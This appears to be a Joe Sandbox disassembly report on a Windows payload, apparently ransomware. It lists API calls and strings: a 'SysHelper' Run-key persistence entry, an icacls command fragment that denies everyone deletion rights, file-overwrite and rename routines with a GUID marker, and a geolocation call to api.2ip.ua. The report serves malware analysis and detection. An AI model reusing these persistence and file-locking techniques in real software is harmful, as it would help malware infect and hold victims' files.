                                                                                                                            control_flow_graph 985 e41cd0-e41d1a call e5f7c0 RegOpenKeyExW 988 e42207-e42216 985->988 989 e41d20-e41d8d call e5b420 RegQueryValueExW RegCloseKey 985->989 992 e41d93-e41d9c 989->992 993 e41d8f-e41d91 989->993 995 e41da0-e41da9 992->995 994 e41daf-e41dcb call e45c10 993->994 999 e41dd1-e41df8 lstrlenA call e43520 994->999 1000 e41e7c-e41e87 994->1000 995->995 996 e41dab-e41dad 995->996 996->994 1006 e41e28-e41e2c 999->1006 1007 e41dfa-e41dfe 999->1007 1002 e41e94-e41f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 e41e89-e41e91 call e52587 1000->1003 1014 e41f36-e41f38 1002->1014 1015 e41f3a-e41f3f 1002->1015 1003->1002 1012 e41e3c-e41e50 PathFileExistsW 1006->1012 1013 e41e2e-e41e39 call e52587 1006->1013 1010 e41e00-e41e08 call e52587 1007->1010 1011 e41e0b-e41e23 call e445a0 1007->1011 1010->1011 1011->1006 1012->1000 1021 e41e52-e41e57 1012->1021 1013->1012 1019 e41f4f-e41f96 call e45c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 e41f40-e41f49 1015->1020 1032 e41fce-e41fe9 1019->1032 1033 e41f98-e41fa0 1019->1033 1020->1020 1024 e41f4b-e41f4d 1020->1024 1025 e41e59-e41e5e 1021->1025 1026 e41e6a-e41e6e 1021->1026 1024->1019 1025->1026 1030 e41e60-e41e65 call e44690 1025->1030 1026->988 1029 e41e74-e41e77 1026->1029 1034 e421ff-e42204 call e52587 1029->1034 1030->1026 1038 e41fef-e41ff8 1032->1038 1039 e41feb-e41fed 1032->1039 1035 e41fa6-e41faf 1033->1035 1036 e41fa2-e41fa4 1033->1036 1034->988 1042 e41fb0-e41fb9 1035->1042 1040 e41fbf-e41fc9 call e45c10 1036->1040 1044 e42000-e42009 1038->1044 1043 e4200f-e42076 call e45c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1039->1043 1040->1032 1042->1042 1045 e41fbb-e41fbd 1042->1045 1050 e421d1-e421d5 1043->1050 1051 e4207c-e42107 call e5b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1051 1044->1044 1047 e4200b-e4200d 1044->1047 1045->1040 1047->1043 1053 e421d7-e421df call e52587 1050->1053 1054 e421e2-e421fa 1050->1054 1058 e42115-e421a8 call e5b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1058 1059 e42109-e42110 call e43260 1051->1059 1053->1054 1054->988 1055 e421fc 1054->1055 1055->1034 1064 e421b2-e421b8 1058->1064 1065 e421aa-e421b0 GetLastError 1058->1065 1059->1058 1066 e421c0-e421cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D12
                                                                                                                            • _memset.LIBCMT ref: 00E41D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E41D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E41DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E41E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00E41E99
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E41EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E41EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E41EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E41ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00E41EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00E41EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00E41F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00E41F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00E41F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E41F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 00E4202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00E42036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00E4204C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E4206E
                                                                                                                            • _memset.LIBCMT ref: 00E42090
                                                                                                                            • lstrcpyW.KERNEL32(?,00F302FC), ref: 00E420AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00E420C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 00E420CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E420D7
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00E420F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E420FC
                                                                                                                            • _memset.LIBCMT ref: 00E42120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00E42146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00E42158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00E4216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: 7f06bb7286dd101111ce262e842e2ad4e881863734f805340186754f4906e3a9
                                                                                                                            • Instruction ID: 1476c86f32745e256d9ad02768f0e62f82456a37079306ab4cb2390ff7e91fbd
                                                                                                                            • Opcode Fuzzy Hash: 7f06bb7286dd101111ce262e842e2ad4e881863734f805340186754f4906e3a9
                                                                                                                            • Instruction Fuzzy Hash: 6DE15071D4021DABDF24DBA0DD59BEEB7B8AF04304F2040A9E605F7191EB74AA89CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E411C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1067 e411c0-e4121d CreateFileW 1068 e41223-e41232 GetFileSizeEx 1067->1068 1069 e418eb-e418fb 1067->1069 1070 e41234 1068->1070 1071 e412a3-e412be VirtualAlloc 1068->1071 1074 e41236-e4123a 1070->1074 1075 e4123c-e41281 CloseHandle call e43100 call e459d0 MoveFileW 1070->1075 1072 e412c0-e412d5 call e5b420 1071->1072 1073 e4131a-e41331 CloseHandle 1071->1073 1080 e413b1 1072->1080 1081 e412db-e412de 1072->1081 1074->1071 1074->1075 1075->1069 1091 e41287-e412a2 call e52587 1075->1091 1085 e413b7-e413ef SetFilePointer 1080->1085 1083 e412e0-e412e3 1081->1083 1084 e412e9-e4130a SetFilePointerEx 1081->1084 1083->1080 1083->1084 1087 e41332-e4134d ReadFile 1084->1087 1088 e4130c-e41314 VirtualFree 1084->1088 1089 e413f5-e4140d ReadFile 1085->1089 1090 e415bf 1085->1090 1087->1088 1092 e4134f-e41354 1087->1092 1088->1073 1093 e41440-e41445 1089->1093 1094 e4140f-e4143f VirtualFree CloseHandle call e42d50 1089->1094 1095 e415c5-e415d9 SetFilePointerEx 1090->1095 1092->1088 1097 e41356-e41359 1092->1097 1093->1090 1099 e4144b-e4146b 1093->1099 1095->1094 1100 e415df-e415eb 1095->1100 1097->1085 1102 e4135b-e41377 call e42c40 call e47060 1097->1102 1104 e41471-e415a8 lstrlenA call e50be4 lstrlenA call e5d8d0 lstrlenA call e3eaa0 call e52110 call e3c5c0 call e42d10 call e42d50 call e3bbd0 call e3bd50 call e43ff0 call e42f70 call e3c070 SetFilePointer 1099->1104 1105 e41718-e417d9 lstrlenA call e50be4 lstrlenA call e5d8d0 lstrlenA call e3eaa0 call e52110 call e3bbd0 call e3bd50 call e42f70 call e3c070 1099->1105 1106 e415ed-e415fc WriteFile 1100->1106 1107 e4160e-e41643 call e430b0 call e42840 1100->1107 1127 e413a7-e413af call e42d50 1102->1127 1128 e41379-e41391 VirtualFree CloseHandle call e42d50 1102->1128 1185 e417e1-e4182e call e42d50 call e42c40 call e42bf0 call e3cba0 1104->1185 1196 e415ae-e415ba call e42d50 * 2 1104->1196 1105->1185 1106->1094 1109 e41602-e4160b call e52110 1106->1109 1130 e41645 1107->1130 1131 e41647-e4165a WriteFile call e42d50 1107->1131 1109->1107 1127->1085 1138 e41396-e413a6 1128->1138 1130->1131 1131->1094 1144 e41660-e41680 lstrlenA WriteFile 1131->1144 1144->1094 1148 e41686-e416de CloseHandle call e43100 call e459d0 MoveFileW 1144->1148 1161 e416e4-e416f7 VirtualFree call e43210 1148->1161 1162 e418a7-e418d3 call e43210 call e42d50 1148->1162 1170 e416fc-e41717 call e42d50 1161->1170 1183 e418d5-e418dd VirtualFree 1162->1183 1184 e418e3-e418e6 1162->1184 1183->1184 1184->1069 1187 e418e8-e418e9 CloseHandle 1184->1187 1203 e41830-e41832 1185->1203 1204 e4186e-e418a6 VirtualFree CloseHandle call e42d50 * 2 1185->1204 1187->1069 1196->1090 1203->1204 1205 e41834-e4185b WriteFile 1203->1205 1205->1204 1207 e4185d-e41869 call e42d50 1205->1207 1207->1095
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E4120F
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E41228
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4123D
                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00E41277
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00E412B1
                                                                                                                            • _memset.LIBCMT ref: 00E412C8
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E41301
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E41314
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4131B
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00E41349
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00E41381
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E41388
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00E413E6
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00E41409
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E41417
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4141E
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00E41471
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00E41491
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00E414CF
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00E4159D
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E415D0
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E415F8
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E41649
                                                                                                                            • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E4166B
                                                                                                                            • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E41678
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E4168D
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00E416D6
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E416EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                            • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            • API String ID: 254274740-1186676987
                                                                                                                            • Opcode ID: 7f72af5a84a085d7840261cdad283b813733e9e396082c66c057857ba91d0e91
                                                                                                                            • Instruction ID: 9f4ff016a21059c7de822988004a7bfef97b1270c368c23d6c0952a0006ff551
                                                                                                                            • Opcode Fuzzy Hash: 7f72af5a84a085d7840261cdad283b813733e9e396082c66c057857ba91d0e91
                                                                                                                            • Instruction Fuzzy Hash: 60228A70D00208AFEF14DFA4EC85BEEB7B8EF45304F6041A9F515B6291DB706A89CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E42220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1213 e42220-e4228a call e5f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 e4228c-e422ba LoadLibraryW GetProcAddress * 3 1213->1216 1217 e422bd-e422d1 K32EnumProcesses 1213->1217 1216->1217 1218 e422d3-e422de 1217->1218 1219 e422df-e422ec 1217->1219 1220 e42353-e4235b 1219->1220 1221 e422ee 1219->1221 1222 e422f0-e42308 OpenProcess 1221->1222 1223 e42346-e42351 CloseHandle 1222->1223 1224 e4230a-e4231a K32EnumProcessModules 1222->1224 1223->1220 1223->1222 1224->1223 1225 e4231c-e42339 K32GetModuleBaseNameW call e50235 1224->1225 1227 e4233e-e42343 1225->1227 1227->1223 1228 e42345 1227->1228 1228->1223
                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E42235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00E42240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00E42248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00E42256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E4226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E42275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E42280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00E42291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E4229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E422AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E422B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00E422CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00E422FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00E42315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00E4232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E42347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: d24ff90f7e5ad87ba96df983101bba47e13cf8b13e9c61dda1230c82ce692d42
                                                                                                                            • Instruction ID: 787d830c2b5e2ce615324755450eae9124196e81027ba0ca24750faa4ac12bb8
                                                                                                                            • Opcode Fuzzy Hash: d24ff90f7e5ad87ba96df983101bba47e13cf8b13e9c61dda1230c82ce692d42
                                                                                                                            • Instruction Fuzzy Hash: 7D318D71E0121DAFDB10AFA59C45EEEBBB8EF89704F10006AFA04F2150DA74DA05DFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00E4F15E
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E4F185
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E4F19D
                                                                                                                            • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00E4F9D0
                                                                                                                              • Part of subcall function 00E40A50: GetLogicalDrives.KERNEL32 ref: 00E40A75
                                                                                                                              • Part of subcall function 00E40A50: SetErrorMode.KERNEL32(00000001,00F30234,00000002), ref: 00E40AE2
                                                                                                                              • Part of subcall function 00E40A50: PathFileExistsA.SHLWAPI(?), ref: 00E40AF9
                                                                                                                              • Part of subcall function 00E40A50: SetErrorMode.KERNEL32(00000000), ref: 00E40B02
                                                                                                                              • Part of subcall function 00E40A50: GetDriveTypeA.KERNEL32(?), ref: 00E40B1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3672571082-3404278061
                                                                                                                            • Opcode ID: a363d70b61d50c00cd0a5267f61784728102cba2ea72112cdeaa856b20954b4a
                                                                                                                            • Instruction ID: c5ddd0b9e743f3eb97a276015056d2f4dbeabe6201cc158bcad4aa800d3f5383
                                                                                                                            • Opcode Fuzzy Hash: a363d70b61d50c00cd0a5267f61784728102cba2ea72112cdeaa856b20954b4a
                                                                                                                            • Instruction Fuzzy Hash: 7842BE71D003059BDF24DFA8E885BAEBBF1BF44708F245529E805BB281E775A909CBD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1829 e3cf10-e3cfb0 call e5f7c0 call e5b420 InternetOpenW call e45c10 InternetOpenUrlW 1836 e3cfb2-e3cfb4 1829->1836 1837 e3cfb9-e3cffb InternetReadFile InternetCloseHandle * 2 call e456d0 1829->1837 1838 e3d213-e3d217 1836->1838 1842 e3d000-e3d01d 1837->1842 1840 e3d224-e3d236 1838->1840 1841 e3d219-e3d221 call e52587 1838->1841 1841->1840 1844 e3d023-e3d02c 1842->1844 1845 e3d01f-e3d021 1842->1845 1848 e3d030-e3d035 1844->1848 1847 e3d039-e3d069 call e456d0 call e44300 1845->1847 1854 e3d1cb 1847->1854 1855 e3d06f-e3d08b call e43010 1847->1855 1848->1848 1849 e3d037 1848->1849 1849->1847 1857 e3d1cd-e3d1d1 1854->1857 1863 e3d0b9-e3d0bd 1855->1863 1864 e3d08d-e3d091 1855->1864 1859 e3d1d3-e3d1db call e52587 1857->1859 1860 e3d1de-e3d1f4 1857->1860 1859->1860 1861 e3d201-e3d20f 1860->1861 1862 e3d1f6-e3d1fe call e52587 1860->1862 1861->1838 1862->1861 1866 e3d0bf-e3d0ca call e52587 1863->1866 1867 e3d0cd-e3d0e1 call e44300 1863->1867 1869 e3d093-e3d09b call e52587 1864->1869 1870 e3d09e-e3d0b4 call e43d40 1864->1870 1866->1867 1867->1854 1880 e3d0e7-e3d149 call e43010 1867->1880 1869->1870 1870->1863 1883 e3d150-e3d15a 1880->1883 1884 e3d160-e3d162 1883->1884 1885 e3d15c-e3d15e 1883->1885 1887 e3d165-e3d16a 1884->1887 1886 e3d16e-e3d18b call e3b650 1885->1886 1891 e3d19a-e3d19e 1886->1891 1892 e3d18d-e3d18f 1886->1892 1887->1887 1888 e3d16c 1887->1888 1888->1886 1891->1883 1894 e3d1a0 1891->1894 1892->1891 1893 e3d191-e3d198 1892->1893 1893->1891 1895 e3d1c7-e3d1c9 1893->1895 1896 e3d1a2-e3d1a6 1894->1896 1895->1896 1897 e3d1b3-e3d1c5 1896->1897 1898 e3d1a8-e3d1b0 call e52587 1896->1898 1897->1857 1898->1897
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E3CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E3CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00E3CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
